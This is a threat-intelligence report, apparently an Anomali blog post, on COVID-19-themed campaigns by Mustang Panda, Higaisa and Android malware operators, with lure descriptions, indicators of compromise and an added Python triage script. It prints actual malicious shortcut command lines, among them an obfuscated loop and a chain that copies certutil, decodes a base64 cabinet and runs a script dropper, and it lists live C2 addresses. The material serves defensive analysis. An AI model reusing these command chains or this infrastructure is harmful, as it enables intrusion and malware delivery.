
COVID-19 Themes Are Being Utilized by Threat Actors of Varying Sophistication

Threat actors are utilizing the global spread of COVID-19 (Coronavirus) to conduct malicious activity. As the world responds to this threat in various ways, actors are attempting to use the chaos to their advantage.

Anomali Threat Research
March 23, 2020
<p><em>Authored by: Gage Mele, Parthiban R., and Tara Gould</em></p><h3>The Tactics, Techniques and Procedures (TTPs) Are Known but the Content Is Coronavirus-Themed</h3><h2>Overview</h2><p>Threat actors are utilizing the global spread of COVID-19 (Coronavirus) to conduct malicious activity. As the world responds to this threat in various ways, actors are attempting to use the chaos to their advantage. COVID-19 is being weaponized as a scare tactic by threat actors conducting malicious activity with a range of Tactics, Techniques, and Procedures (TTPs). While the majority of observations made by Anomali Threat Research (ATR) are commodity (purchasable and widely distributed) campaigns and malware, ATR identified that the Higaisa and Mustang Panda Advanced Persistent Threat (APT) groups have been utilizing Coronavirus-themed lures in their campaigns.</p><p>In addition to campaigns targeting computers, ATR also identified COVID-19 themes targeting Android mobile devices. One sample is a fully functional Coronavirus infection-tracking application that runs while the SpyNote Remote Access Trojan (RAT) operates in the background. Another is a phishing campaign that uses a fake Adobe Flash update and COVID-19-related URLs to install the Cerberus banking trojan. 
While some of this malware is commodity and may be a more obvious malicious attempt, actors will likely continue to abuse these themes to install various malware families, some of which are discussed below.</p><h2>Details</h2><p>The current activity reported in open sources consists of threat actors using COVID-19 in phishing campaigns, in email subjects and bodies as well as in attachments.<sup>[1]</sup> These kinds of virus-themed campaigns began almost immediately after the 41 cases of COVID-19 were reported by the World Health Organization on December 31, 2019.<sup>[2]</sup> By January and February 2020, Coronavirus-themed lures were widespread, with assistance from the Emotet botnet.<sup>[3]</sup> The malware used in these campaigns varies because many distribution methods are offered for purchase and utilized by numerous actors; however, there have also been instances of Advanced Persistent Threat (APT) actors attempting to capitalize on the COVID-19 outbreak.</p><p>In mid-March 2020, Check Point Research published findings regarding a campaign targeting the Mongolian public sector with Coronavirus-themed lure documents.<sup>[4]</sup> This RTF activity coincides with RTF activity identified by ATR.<sup>[5]</sup> APTs frequently use relevant themes as lures, and ATR has identified such groups attempting to capitalize on Coronavirus-related events.</p><h2>APT Activity</h2><p>ATR observed a campaign, running from late February through mid-March 2020, that we believe is being conducted by the China-based APT group Mustang Panda. The group is utilizing decoy documents related to COVID-19 to target Taiwan and Vietnam. Mustang Panda continues to use Cobalt Strike and the PlugX RAT as its final payloads. 
This activity aligns with Mustang Panda TTPs previously identified by ATR.<sup>[6]</sup></p><h2>Lure Documents</h2><p><strong>Document title</strong> - 02-21-1.docx</p><p><strong>Hash</strong> - 6d994c64c17ce50cbb333c8b4bcbd8e0</p><p style="text-align: center;"><em><strong><img alt="Chen Chien-jen Facebook Discussion" src="https://cdn.filestackcontent.com/uygM4gr8S5SXzbVienvd"/><br/> Figure 1</strong> - Chen Chien-jen Facebook Discussion</em></p><p>The document shown above describes a Facebook post written by Chen Chien-jen, current Vice President of the Republic of China (Taiwan) and former Vice President of the Taiwanese research institution Academia Sinica. The post discusses community transmission [of Coronavirus] and the United States (US) Centers for Disease Control (CDC) listing of countries with it, specifically Taiwan; Taiwan’s Foreign Ministry subsequently demanded removal from that listing.</p><p><strong>Document title</strong> - 03-01-1.docx</p><p><strong>Hash</strong> - 7f0a1bdde14ea1f3085b43bdadcfb146</p><p style="text-align: center;"><em><strong><img alt="COVID-19 Questions" src="https://cdn.filestackcontent.com/F3mexsJeRa6uoPeqwMFH"/><br/> Figure 2</strong> - COVID-19 Questions</em></p><p>Figure 2 contains text that appears to have been translated into English, judging by spelling and grammar errors that would be uncommon for a native speaker; the source language was likely Chinese, given that Mustang Panda is China-based. 
The text poses questions about neutralizing COVID-19 with varying levels of sophistication.</p><p><strong>Document title</strong> - Chi Thi cua thu tuong nguyen xuan phuc.doc</p><p><strong>Hash</strong> - 13d61974d2db537bdb0504cfc53b74a7</p><p style="text-align: center;"><em><strong><img alt="Vietnamese Government Meeting Article from March 3, 2020" src="https://cdn.filestackcontent.com/RLzDfxvnTBOFLYCNC7B4"/><br/> Figure 3</strong> - Vietnamese Government Meeting Article from March 3, 2020</em></p><p>The document in Figure 3 is an article discussing a meeting held by Vietnamese Prime Minister Nguyen Xuan Phuc on March 3, 2020. Other government officials attending the meeting spoke of unity in these times and reported that approximately 3,000 people had been placed in isolation under the care of the army. Other topics included overall Coronavirus prevention measures and updates on travel restrictions. The article is publicly available at www.cantho.gov[.]vn and was likely taken by Mustang Panda from this source, as ATR has observed in previous campaigns conducted by the group.</p><h2>Technical Analysis</h2><p>The three RAR archives mentioned above each contain a Windows Shortcut (.lnk) file. The .lnk files utilized by Mustang Panda typically contain an embedded HTA file with VBScript that, once executed, drops and opens the decoy document while the malicious payload runs in the background. 
ATR observed PlugX and Cobalt Strike being delivered as the primary payloads throughout the campaign.</p><h3>.lnk files</h3><p style="text-align: center;"><em><strong>Table 1</strong> - .lnk file metadata</em></p><table class="table table-striped" style="table-layout: fixed;"><tbody><tr><th style="word-wrap: break-word;">FileMD5</th><th style="word-wrap: break-word;">LinkModifiedDate</th><th style="word-wrap: break-word;">FileSize</th><th style="word-wrap: break-word;">NameString</th><th style="word-wrap: break-word;">CommandLineArgs</th><th style="word-wrap: break-word;">NetBios Name</th><th style="word-wrap: break-word;">MAC Address</th></tr><tr><td style="word-wrap: break-word;">FC00964131A8C9407BA77484E724FC9D</td><td style="word-wrap: break-word;">7/14/2009 1:14</td><td style="word-wrap: break-word;">301568</td><td style="word-wrap: break-word;">02-21-1.lnk</td><td style="word-wrap: break-word;">/c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do f%windir:~-3,1%%PUBLIC:~-9,1% /f delims==" %i in ('dir "%x-21-1.lnk" /s /b') do start %TEMP:~-2</td><td style="word-wrap: break-word;">win-67od36i8f4c</td><td style="word-wrap: break-word;">00:0C:29:50:2D:E6</td></tr><tr><td style="word-wrap: break-word;">0F794D6C6646A260558E9D638AE060C9</td><td style="word-wrap: break-word;">7/14/2009 1:14</td><td style="word-wrap: break-word;">301568</td><td style="word-wrap: break-word;">03-01-1.lnk</td><td style="word-wrap: break-word;">/c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do f%windir:~-3,1%%PUBLIC:~-9,1% /f delims==" %i in ('dir "%x-01-1.lnk" /s /b') do start %TEMP:~-2</td><td style="word-wrap: break-word;">cia-at28--planc</td><td style="word-wrap: break-word;">00:0C:29:50:2D:E6</td></tr><tr><td style="word-wrap: break-word;">A4B7FE08900074B6A103D2CF36730421</td><td style="word-wrap: break-word;">11/21/2010 3:24</td><td style="word-wrap: break-word;">302592</td><td style="word-wrap: break-word;">Chi Thi cua thu tuong nguyen xuan phuc.lnk</td><td 
style="word-wrap: break-word;">/c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do f%windir:~-3,1%%PUBLIC:~-9,1% /f delims==" %i in ('dir "%xChi Thi cua thu tuong nguyen xuan phuc.lnk" /s /b') do start %TEMP:~-2</td><td style="word-wrap: break-word;">win-gnhs1vcenrt</td><td style="word-wrap: break-word;">AA:50:18:7E:EB:82</td></tr></tbody></table><h3>Payload Analysis</h3><p>Mustang Panda used the well-known adversary emulation tool Cobalt Strike as the final payload for the samples <strong>02-21-1.lnk</strong> and <strong>03-01-1.lnk</strong>. The group utilized the Malleable Command and Control (C2) feature of Cobalt Strike to mask the malicious traffic behind a legitimate DNS request to code.jquery.com. These samples use 123.51.185[.]75 as their final C2.</p><p>Two notable changes from Mustang Panda’s previous campaigns identified by ATR are:</p><ul><li>The payload is now dropped in the directory <strong>C:\Users\Public\Music</strong></li><li>The legitimate executable <strong>tencentsoso.exe</strong> is used for DLL side-loading</li></ul><p>The sample <strong>Chi Thi cua thu tuong nguyen xuan phuc.lnk</strong> uses <strong>PlugX</strong> as its final payload. Once executed, it drops three files in the directory <strong>C:\ProgramData\Microsoft Malware Protection\ydy</strong>. <strong>unescapp.exe</strong> is a legitimate executable signed by “ESET, spol. s r.o.”; it is abused through DLL hijacking to execute http_dll.dll, which decodes and loads the malicious payload http_dll.dat. 
Upon execution, the payload reaches out to the C2 domain vietnam[.]zing[.]photos, which resolves to 104.160.44[.]85.</p><p style="text-align: center;"><em><strong><img alt="Dropped File Location" src="https://cdn.filestackcontent.com/RXEMSlWiTSiqbrIp0Rgd"/><br/> Figure 4</strong> - Dropped File Location</em></p><p>ATR attributes this activity to Mustang Panda based on the TTPs, targeted countries, and malware families, all of which have previously been attributed to the group.<sup>[7]</sup></p><h2>Higaisa Activity</h2><p><strong>File name</strong> - Covid.pdf.lnk</p><p><strong>Hash</strong> - 21a51a834372ab11fba72fb865d6830e</p><p>On March 15, 2020, ATR identified a malicious .lnk file that utilizes an infection chain similar to those of other known APT groups. This campaign was found to use C2 infrastructure that overlaps with the Korea-based APT group Higaisa. The lure document, dropped by the .lnk file, was downloaded from the World Health Organization website and is likely being used to target English-speaking individuals and entities.</p><p>The .lnk file uses a multi-stage process to deliver a decoy PDF document (Figure 5) and the final payload, PlugX, which reaches out to the C2 domain motivation[.]neighboring[.]site, resolving to 69.172.75[.]223. PlugX is a Remote Access Trojan (RAT) commonly used by China-based threat actors.</p><p style="text-align: center;"><em><strong><img alt="World Health Organization Situation Report" src="https://cdn.filestackcontent.com/s7AuHINcQlisMpNyC09n"/><br/> Figure 5</strong> - World Health Organization Situation Report</em></p><h3>Technical Analysis</h3><p>The .lnk file contains an embedded blob of base64-encoded content. 
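</p>
<p>The shortcut arguments in Table 1 hide the keyword <strong>for</strong> behind cmd.exe substring expansion: with the default values of <strong>windir</strong> and <strong>PUBLIC</strong>, <strong>%windir:~-3,1%</strong> and <strong>%PUBLIC:~-9,1%</strong> each evaluate to a single letter. The Higaisa chain listed below stages a base64-encoded cabinet through a wildcard copy of a System32 binary and a <strong>-decode</strong> switch. The following Python triage helper is an added example, not code from the original post or from Anomali; it resolves the general <strong>%VAR:~start,len%</strong> syntax against assumed default variable values (the TEMP path is constructed) and flags those staging steps in both command lines.</p>

```python
"""Deobfuscate cmd.exe substring tricks and flag the LOLBin staging steps seen in
the .lnk command lines of this post. Added example, not Anomali's tooling."""
import base64
import re

# Assumed default values for the variables the shortcuts index into; a real
# triage tool would take these from the host under analysis.
DEFAULT_ENV = {
    "windir": r"C:\Windows",
    "PUBLIC": r"C:\Users\Public",
    "TEMP": r"C:\Users\analyst\AppData\Local\Temp",  # constructed value
}

_SUBSTR = re.compile(r"%(\w+):~(-?\d+)(?:,(-?\d+))?%")  # %VAR:~start,len%
_PLAIN = re.compile(r"%(\w+)%")                          # %VAR%
_FINDSTR = re.compile(r'findstr(?:\.exe)?\s+"([A-Za-z0-9+/=]+)"', re.I)

# Fixed-pattern indicators; each corresponds to one stage of the chains above.
INDICATORS = [
    ("wildcard copy of a System32 binary", re.compile(r"\(\*\w*\*\.exe\)", re.I)),
    ("-decode of a staged file", re.compile(r"\s-decode\s", re.I)),
    ("cabinet expansion into %tmp%", re.compile(r"\bexpand\b[^&]*-F:\*", re.I)),
    ("script host launched from %tmp%", re.compile(r"\b[wc]script\b[^&]*%tmp%", re.I)),
    ("for /f loop over a directory listing", re.compile(r"\bfor\s+/f\b.*\bdir\b", re.I)),
    ("shortcut locates or copies its own .lnk", re.compile(r'(?:copy|dir)\s+"[^"]*\.lnk"', re.I)),
]


def expand_substrings(cmd, env=DEFAULT_ENV):
    """Resolve %VAR:~start,len% substrings, then plain %VAR%, for known variables."""
    env_ci = {k.lower(): v for k, v in env.items()}  # cmd.exe names are case-insensitive

    def sub_repl(m):
        value = env_ci.get(m.group(1).lower())
        if value is None:
            return m.group(0)  # unknown variable: leave untouched
        start = int(m.group(2))
        # a negative start counts back from the end of the value
        start = max(len(value) + start, 0) if start < 0 else min(start, len(value))
        if m.group(3) is None:
            return value[start:]
        length = int(m.group(3))
        # a negative length is an offset from the end, not a count
        end = len(value) + length if length < 0 else start + length
        return value[start:end]

    def plain_repl(m):
        value = env_ci.get(m.group(1).lower())
        return m.group(0) if value is None else value

    return _PLAIN.sub(plain_repl, _SUBSTR.sub(sub_repl, cmd))


def looks_like_base64_cab(token):
    """True if a base64 token decodes to a cabinet header (magic bytes 'MSCF')."""
    padded = token + "=" * (-len(token) % 4)
    try:
        return base64.b64decode(padded).startswith(b"MSCF")
    except ValueError:
        return False


def analyze(cmd, env=DEFAULT_ENV):
    """Return the deobfuscated command line, matched indicators and a verdict."""
    expanded = expand_substrings(cmd, env)
    hits = []
    if _SUBSTR.search(cmd):
        hits.append("substring-obfuscated keywords")
    for label, pattern in INDICATORS:
        if pattern.search(expanded):
            hits.append(label)
    for token in _FINDSTR.findall(expanded):
        if looks_like_base64_cab(token):
            hits.append("findstr for base64-encoded cabinet header")
    verdict = "suspicious" if len(hits) >= 2 else "no staging indicators"
    return {"expanded": expanded, "indicators": hits, "verdict": verdict}


# Command-line arguments as listed in this post (Table 1 and the Higaisa chain).
MUSTANG_PANDA_ARGS = (
    '/c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do '
    'f%windir:~-3,1%%PUBLIC:~-9,1% /f delims==" %i in (\'dir "%x-21-1.lnk" /s /b\') '
    'do start %TEMP:~-2'
)
HIGAISA_ARGS = (
    r'/c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\g4ZokyumBB2gDn.tmp /y& '
    r'for /r C:\Windows\System32\ %i in (*ertu*.exe) do copy %i %tmp%\msoia.exe /y& '
    r'findstr.exe "TVNDRgAAAA" %tmp%\g4ZokyumBB2gDn.tmp>%tmp%\cSi1r0uywDNvDu.tmp&'
    r'%tmp%\ msoia.exe -decode %tmp%\cSi1r0uywDNvDu.tmp %tmp%\oGhPGUDC03tURV.tmp& '
    r'expand %tmp%\oGhPGUDC03tURV.tmp -F:* %tmp% & wscript %tmp%\9sOXN6Ltf0afe7.js'
)

if __name__ == "__main__":
    for name, args in (("Mustang Panda", MUSTANG_PANDA_ARGS), ("Higaisa", HIGAISA_ARGS)):
        report = analyze(args)
        print(name, report["verdict"], report["indicators"], sep=": ")
```
<p>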
Inspecting the .lnk metadata suggests that the actor has modified it: the creation time, Machine ID, and MAC address fields appear to have been tampered with, as shown in Figure 6.</p><p style="text-align: center;"><em><strong><img alt=".lnk Metadata" src="https://cdn.filestackcontent.com/eqfWi7L2SbiWLTAI3p0H"/><br/> Figure 6</strong> - .lnk Metadata</em></p><p>Upon execution of the .lnk file, the following commands are run in the background:</p><pre> /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\g4ZokyumBB2gDn.tmp /y&amp; for /r C:\Windows\System32\ %i in (*ertu*.exe) do copy %i %tmp%\msoia.exe /y&amp; findstr.exe "TVNDRgAAAA" %tmp%\g4ZokyumBB2gDn.tmp&gt;%tmp%\cSi1r0uywDNvDu.tmp&amp;%tmp%\ msoia.exe -decode %tmp%\cSi1r0uywDNvDu.tmp %tmp%\oGhPGUDC03tURV.tmp&amp; expand %tmp%\oGhPGUDC03tURV.tmp -F:* %tmp% &amp; wscript %tmp%\9sOXN6Ltf0afe7.js</pre><p>The file cSi1r0uywDNvDu.tmp is a <strong>Windows cabinet</strong> (.cab) file. The contents of the cabinet file are shown in Figure 7 below.</p><p style="text-align: center;"><em><strong><img alt="Contents of Cabinet File" src="https://cdn.filestackcontent.com/ul1qz0k5TzOkbB9uFgzY"/><br/> Figure 7</strong> - Contents of Cabinet File</em></p><p>The contents of the cabinet file are extracted using the built-in Windows executable <strong>extract.exe</strong> and renamed as shown in Figure 8.</p><p style="text-align: center;"><em><strong><img alt="Renamed Cabinet File Contents" src="https://cdn.filestackcontent.com/lQYd6ZqxQ4OOjClgNMbT"/><br/> Figure 8</strong> - Renamed Cabinet File Contents</em></p><p>The JavaScript file <strong>9sOXN6Ltf0afe7.js</strong> performs multiple operations, such as copying and renaming files, and uses a living-off-the-land technique to execute the VBScript file <strong>WsmPty.xsl</strong> via <strong>cscript.exe</strong>.<sup>[8]</sup> The VBScript establishes persistence and executes the further payloads by abusing the legitimate executable 
<strong>msostyle.exe</strong>. Upon execution, msostyle.exe loads the file <strong>oinfo12.ocx</strong> (a DLL), which in turn loads and executes <strong>wordcnvpxy.exe</strong> (PlugX). The malware reaches out to the C2 URL motivation[.]neighboring[.]site/01/index.php.</p><p>Figures 9 and 10 below depict the overlapping evidence mentioned above. The C2 IP, 69.172.75[.]223, was previously used by Higaisa and reported on in late February 2020.<sup>[9]</sup></p><p style="text-align: center;"><em><strong><img alt="Higaisa C2 Overlap" src="https://cdn.filestackcontent.com/ajDr1oOwS5mDVpgKZYTu"/><br/> Figure 9</strong> - Higaisa C2 Overlap</em></p><p style="text-align: center;"><em><strong><img alt="Higaisa Sample Communication to IP" src="https://cdn.filestackcontent.com/2sT6sKDuRiqyJkJYds6e"/><br/> Figure 10</strong> - Higaisa Sample Communication to IP (https://community.riskiq.com/search/69.172.75.223)</em></p><h2>Mobile Malware</h2><p><strong>APK title</strong> - Avist.apk</p><p><strong>Hash</strong> - 107169ae6951a5cba57d2a0cd274e28fadf5c73d73e91a386f15cf4dc35edd38</p><p>This Android application is fully functional and updates overall COVID-19 statistics as a legitimate application would. 
While the user installs the COVID-19 tracking application, the <strong>SpyNote</strong> RAT is downloaded in the background.</p><p style="text-align: center;"><em><strong><img alt="Installation Request" src="https://cdn.filestackcontent.com/8zK9aw3WSwyxiZbM6dT7"/><br/> Figure 11</strong> - Installation Request</em></p><p style="text-align: center;"><em><strong><img alt="Functional COVID-19 Application Appearance" src="https://cdn.filestackcontent.com/ySvXmueQ0SxCgJUPCjpg"/><br/> Figure 12</strong> - Functional COVID-19 Application Appearance</em></p><p><strong>APK title</strong> - UpdateFlashPlayer_11_5_1.apk</p><p><strong>Hash</strong> - F57a44bec2f7af2da443f068edb0a743f9625ac3a9d686393bacb8e72274b5de</p><p>The operators of the Android banking trojan Cerberus have been utilizing the attention around the Coronavirus outbreak as an opportunity to push their malware, using various websites, including <strong>coronaviruscovid-19-information[.]com</strong> and <strong>covid19-info[.]online</strong> (among others), to trick users into downloading the trojan. Navigating to one of these websites prompts the visitor to download Cerberus masquerading as an Adobe Flash Player update. 
Once installed, Cerberus’ primary objective is to steal financial information; however, the trojan can be repurposed depending on the actor’s objective.</p><p style="text-align: center;"><em><strong><img alt="Coronavirus-related URL Prompting for Adobe Flash Player Update (Cerberus)" src="https://cdn.filestackcontent.com/WN4drmBUReyGZH3kmHvI"/><br/> Figure 13</strong> - Coronavirus-related URL Prompting for Adobe Flash Player Update (Cerberus)</em></p><h2>IOCs</h2><h3>Domains / IPs / URLs</h3><p>104.160.44[.]85<br/> 123.51.185[.]75<br/> 69.172.75[.]223<br/> vietnam[.]zing[.]photos<br/> motivation[.]neighboring[.]site<br/> hxxp://vietnam[.]zing[.]photos:443/update?wd=df07d8ba<br/> motivation[.]neighboring[.]site/01/index.php</p><h3>Hashes</h3><table class="table table-striped" style="table-layout: fixed;"><tbody><tr><th style="word-wrap: break-word;">File Name</th><th style="word-wrap: break-word;">MD5 Hash</th></tr><tr><td style="word-wrap: break-word;">Http_dll.dat</td><td style="word-wrap: break-word;">0DE06292C0010A4E8F453806373E68D4</td></tr><tr><td style="word-wrap: break-word;">http_dll.dll</td><td style="word-wrap: break-word;">415591D11CF6AEB940AC92C904A1F26A</td></tr><tr><td style="word-wrap: break-word;">02-21-1.rar</td><td style="word-wrap: break-word;">A0D41E87BF259CE882C4977D79FA806A</td></tr><tr><td style="word-wrap: break-word;">03-01-1.rar</td><td style="word-wrap: break-word;">24AF885E38D7CA7912824F2470E5E6BE</td></tr><tr><td style="word-wrap: break-word;">Chi Thi cua thu tuong nguyen xuan phuc.rar</td><td style="word-wrap: break-word;">60C89B54029442C5E131F01FF08F84C9</td></tr><tr><td style="word-wrap: break-word;">02-21-1.lnk</td><td style="word-wrap: break-word;">FC00964131A8C9407BA77484E724FC9D</td></tr><tr><td style="word-wrap: break-word;">03-01-1.lnk</td><td style="word-wrap: break-word;">0F794D6C6646A260558E9D638AE060C9</td></tr><tr><td style="word-wrap: break-word;">Chi Thi cua thu tuong nguyen xuan phuc.lnk</td><td style="word-wrap: 
break-word;">A4B7FE08900074B6A103D2CF36730421</td></tr><tr><td style="word-wrap: break-word;">3UDBUTNY7YstRc.tmp</td><td style="word-wrap: break-word;">83D04F21515C7E6316F9CD0BB393A118</td></tr><tr><td style="word-wrap: break-word;">486AULMsOPmf6W.tmp</td><td style="word-wrap: break-word;">371E896D818784934BD1456296B99CBE</td></tr><tr><td style="word-wrap: break-word;">9sOXN6Ltf0afe7.js</td><td style="word-wrap: break-word;">4F8FF5E70647DBC5D91326346C393729</td></tr><tr><td style="word-wrap: break-word;">cSi1r0uywDNvDu.tmp</td><td style="word-wrap: break-word;">EEFEB76D26338E09958AAE5D81479178</td></tr><tr><td style="word-wrap: break-word;">MiZl5xsDRylf0W.tmp</td><td style="word-wrap: break-word;">C1D8966FA1BD7AEE41B2C4AD731407D3</td></tr><tr><td style="word-wrap: break-word;">oGhPGUDC03tURV.tmp</td><td style="word-wrap: break-word;">37f78b1ad43959a788162f560bdc9c79</td></tr><tr><td style="word-wrap: break-word;">Covid.pdf.lnk</td><td style="word-wrap: break-word;">21a51a834372ab11fba72fb865d6830e</td></tr><tr><td style="word-wrap: break-word;">Covid.zip</td><td style="word-wrap: break-word;">a89607c9515caeb1d784439a1ee1f208</td></tr><tr><td style="word-wrap: break-word;">Wordcnvpxy.exe</td><td style="word-wrap: break-word;">fd648c3b7495abbe86b850587e2e5431</td></tr><tr><td style="word-wrap: break-word;">20200308-sitrep-48-covid-19.pdf</td><td style="word-wrap: break-word;">FAF5EF01F4A9BF2ABA7EDE67DCC5A2D4</td></tr><tr><td style="word-wrap: break-word;">covid-19.jar</td><td style="word-wrap: break-word;">13c26ea1dc3a2fee403a7913f6f66c03</td></tr><tr><td style="word-wrap: break-word;">covid-precautions .exe</td><td style="word-wrap: break-word;">45a0797b74db206615e92050ecf7b31e</td></tr><tr><td style="word-wrap: break-word;">Basic_protection.pdf</td><td style="word-wrap: break-word;">c9184430cfd1e72ff9213e67f73b06c2</td></tr><tr><td style="word-wrap: break-word;">file2.exe</td><td style="word-wrap: break-word;">ec517204fbcf7a980d137b116afa946d</td></tr><tr><td 
style="word-wrap: break-word;">CoronaVirus_Video-11032020BRTORS2VYLLOC8NTR7DA79YIM6.vbs</td><td style="word-wrap: break-word;">0a648ccc4c7ce4f4315adc22878c49c2</td></tr><tr><td style="word-wrap: break-word;"><a href="https://www.virustotal.com/gui/search/name:%22Official%20communication%20by%20Ferribiella%20Italy-CORONAVIRUS%2011.03.2020_EN.exe%22" target="_blank">Official communication by Ferribiella Italy-CORONAVIRUS 11.03.2020_EN.exe</a></td><td style="word-wrap: break-word;">405f2f6fa2077552fa848bb740bd5ffd</td></tr><tr><td style="word-wrap: break-word;">CORONA TREATMENT.doc</td><td style="word-wrap: break-word;">4efc395c3cd44646e2bfb9680932b811</td></tr><tr><td style="word-wrap: break-word;">logday.dll</td><td style="word-wrap: break-word;">4efc395c3cd44646e2bfb9680932b811</td></tr><tr><td style="word-wrap: break-word;">Coronavirus_disease_COVID-19__773315073441331.doc</td><td style="word-wrap: break-word;">8ff6621ecf76a5632dc7ca459f3e5a89</td></tr><tr><td style="word-wrap: break-word;">卫生部指令.docx</td><td style="word-wrap: break-word;">3519b57181da2548b566d3c49f2bae18</td></tr><tr><td style="word-wrap: break-word;">武汉旅行信息收集申请表.xlsm</td><td style="word-wrap: break-word;">b08dc707dcbc1604cfd73b97dc91a44c</td></tr><tr><td style="word-wrap: break-word;"><a href="https://www.virustotal.com/gui/search/name%253A%2522POEA%2520HEALTH%2520ADVISORY%2520re-2020%2520Novel%2520Corona%2520Virus.pdf.exe%2522" target="_blank">POEA HEALTH ADVISORY re-2020 Novel Corona Virus.pdf.exe</a></td><td style="word-wrap: break-word;">f59c558d9b33a25ac8b32f495f6fd035</td></tr><tr><td style="word-wrap: break-word;">COVID-19_Tracker.exe</td><td style="word-wrap: break-word;">595149b8dcab35fde269a86d0bd74756</td></tr><tr><td style="word-wrap: break-word;">Avist.apk</td><td style="word-wrap: break-word;">660159f431b5f8ec8c4fed0298168d1a</td></tr><tr><td style="word-wrap: break-word;">https://covid19-info[.]online/UpdateFlashPlayer_11_5_1.apk</td><td style="word-wrap: 
break-word;">3382348f9618058dde3aacffcb34982e</td></tr><tr><td style="word-wrap: break-word;">Corona Virus Advice For Public____________________pdf.exe</td><td style="word-wrap: break-word;">8a228725fe66ab52a62eb44687ad0680</td></tr><tr><td style="word-wrap: break-word;">St John of God Health Care (COVID-19) Notice.pdf</td><td style="word-wrap: break-word;">19fda4048f29fbf6e0c9e0a4b8bd0946</td></tr><tr><td style="word-wrap: break-word;">Download PDF File - Coronavirus Disease 2019 Controls scr</td><td style="word-wrap: break-word;">e7fab8e420dd74157bc4dcc5ab396dc8</td></tr></tbody></table><h2>Conclusion</h2><p>Threat actors are opportunistic and will continuously update themes of their malicious campaigns in whichever way they believe will increase the chances of completing an objective. 
Commodity malware will change to whatever themes are relevant to the current period in time. As discussed in this report, threat actors are still utilizing TTPs known about and discussed in the security community; only the content of the social engineering documents has changed.</p><p>The Coronavirus effect is worldwide and increasingly affecting individuals in real life and online. We hope everyone is doing their best to stay safe during these times. Additional information on the Coronavirus can be found on the following websites:</p><ul><li><a href="https://www.cdc.gov/coronavirus/2019-ncov/index.html" target="_blank">https://www.cdc.gov/coronavirus/2019-ncov/index.html</a></li><li><a href="https://www.gov.uk/guidance/coronavirus-covid-19-information-for-the-public" target="_blank">https://www.gov.uk/guidance/coronavirus-covid-19-information-for-the-public</a></li></ul><h2>Endnotes</h2><p><sup>[1]</sup> CISA, “Defending Against COVID-19 Cyber Scams,” US-CERT, accessed March 17, 2020, published March 6, 2020, <a href="https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams" target="_blank">https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams</a>; Insikt Group, “Capitalizing on Coronavirus Panic, Threat Actors Target Victims Worldwide,” Recorded Future, accessed March 17, 2020, published March 12, 2020, <a href="https://go.recordedfuture.com/hubfs/reports/cta-2020-0312-2.pdf" target="_blank">https://go.recordedfuture.com/hubfs/reports/cta-2020-0312-2.pdf</a>.</p><p><sup>[2]</sup> “Rolling updates on Coronavirus disease (COVID-19),” World Health Organization, accessed March 17, 2020, published March 18, 2020, <a href="https://www.who.int/emergencies/diseases/novel-coronavirus-2019/events-as-they-happen" target="_blank">https://www.who.int/emergencies/diseases/novel-coronavirus-2019/events-as-they-happen</a>.</p><p><sup>[3]</sup> Nick Biasini and Edmund Brumghin, “Threat 
actors attempt to capitalize on coronavirus outbreak,” Cisco Talos Blog, accessed March 17, 2020, published February 13, 2020, <a href="https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html" target="_blank">https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html</a>; “January 2020’s Most Wanted Malware: Coronavirus-themed spam spread malicious Emotet malware,” Check Point Blog, accessed March 17, 2020, published February 13, 2020, <a href="https://blog.checkpoint.com/2020/02/13/january-2020s-most-wanted-malware-coronavirus-themed-spam-spreads-malicious-emotet-malware/" target="_blank">https://blog.checkpoint.com/2020/02/13/january-2020s-most-wanted-malware-coronavirus-themed-spam-spreads-malicious-emotet-malware/</a>.</p><p><sup>[4]</sup> “January 2020’s Most Wanted Malware: Coronavirus-themed spam spread malicious Emotet malware,” Check Point Blog.</p><p><sup>[5]</sup> Anomali Threat Research Team, “Multiple Chinese Threat Groups Exploiting CVE-2018-0798 Equation Editor Vulnerability Since Late 2018,” Anomali Blog, accessed March 17, 2020, published July 3, 2019, <a href="https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018">https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018</a>.</p><p><sup>[6]</sup> Anomali Threat Research Team, “China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations,” Anomali Blog, accessed March 17, 2020, published October 7, 2019, <a href="https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations">https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations</a>.</p><p><sup>[7]</sup> Anomali Threat Research Team, “China-Based APT Mustang Panda Targets Minority Groups, Public and Private 
Sector Organizations,” Anomali Blog.</p><p><sup>[8]</sup> “winrm.vbs,” Living Off The Land Binaries and Scripts (and also Libraries), accessed March 20, 2020, <a href="https://lolbas-project.github.io/lolbas/Scripts/Winrm/" target="_blank">https://lolbas-project.github.io/lolbas/Scripts/Winrm/</a>.</p><p><sup>[9]</sup> “Higaisa Recent Attack Activity Report,” Tencent Security Threat Intelligence Center, accessed March 18, 2020, published February 27, 2020, <a href="https://s.tencent.com/research/report/895.html" target="_blank">https://s.tencent.com/research/report/895.html</a>.</p>
Anomali Threat Research

Anomali's Threat Research team continually tracks security threats to identify when new, highly critical security threats emerge. The Anomali Threat Research team's briefings discuss current threats and risks like botnets, data breaches, misconfigurations, ransomware, threat groups, and various vulnerabilities. The team also creates free and premium threat intelligence feeds for Anomali's industry-leading Threat Intelligence Platform, ThreatStream.

Propel your mission with amplified visibility, analytics, and AI.

Learn how Anomali can help you cost-effectively improve your security posture.

March 23, 2020
-
Anomali Threat Research
,

COVID-19 Themes Are Being Utilized by Threat Actors of Varying Sophistication

